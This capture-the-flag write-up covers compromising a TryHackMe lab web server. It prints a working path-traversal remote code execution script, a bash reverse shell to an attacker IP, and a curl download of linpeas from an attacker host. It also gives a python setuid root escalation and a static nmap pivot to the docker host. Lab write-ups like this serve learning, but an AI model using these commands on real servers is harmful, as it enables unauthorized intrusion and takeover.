Oh My Webserver — Writeup
LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb
My Target IP : 10.10.215.246
Let’s run a quick recon on the Target IP
nmap 10.10.215.246 -p- — min-rate 1000
strange i am getting 80 port closed.
This thing i learned in a ctf. which is try to use the knock command to check if the port opens or not.
and it worked!
Running a detailed scan on the discovered port.
nmap 10.10.215.246 -p 80,22 -sCV -oN nmap_initial -Pn
started a Dir Bruteforcing on the WebServer.
There is an error which might be exploitable but we don’t know for sure.
So let’s use the most powerful tool in CyberSec that is GOOGLE.
On googling for the exploit of the version of the web server running i found:
if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
for host in $(cat $1); do
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
First copy this exploit and save as exploit.sh and then create a targets.txt file containing “http://<targetIP>”
chmod +x exploit.sh
echo -e ‘http://<TARGET_IP>’ > targets.txt
bash exploit.sh targets.txt /bin/sh “<command>”
Now that we have RCE. Let’s get a reverse shell.
bash exploit.sh targets.txt /bin/bash “bash -i >& /dev/tcp/10.2.61.21/4242 0>&1”
What is the user flag?
To get root in docker container i downloaded linpeas and executed it
curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh > out.txt
On reading the linpeas output I found something interesting in the capabilities.
cap_setuid can be exploited by
/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
What is the root flag?
For further enumeration I executed linpeas again.
Didn’t find much in linpeas, except this IP so i thought of scanning it so for that i will have to get nmap on the box so let’s get nmap.
GIT HUB LINK: https://github.com/andrew-d/static-binaries
now let’s run a python server here and tranfer to the shell.
chmod +x nmap_
let’s run this :
./nmap_ 172.17.0.1 -p- — min-rate 1000
(we know the IP to scan from linpeas’s output)
5986 port seems interesting, let’s google if there is a exploit for this.
LINK TO THE EXPLOIT:
THERE YOU HAVE IT! Room is completed
HAPPY HACKING!! 🎉🥳
LINK TREE: https://linktr.ee/RishabhRai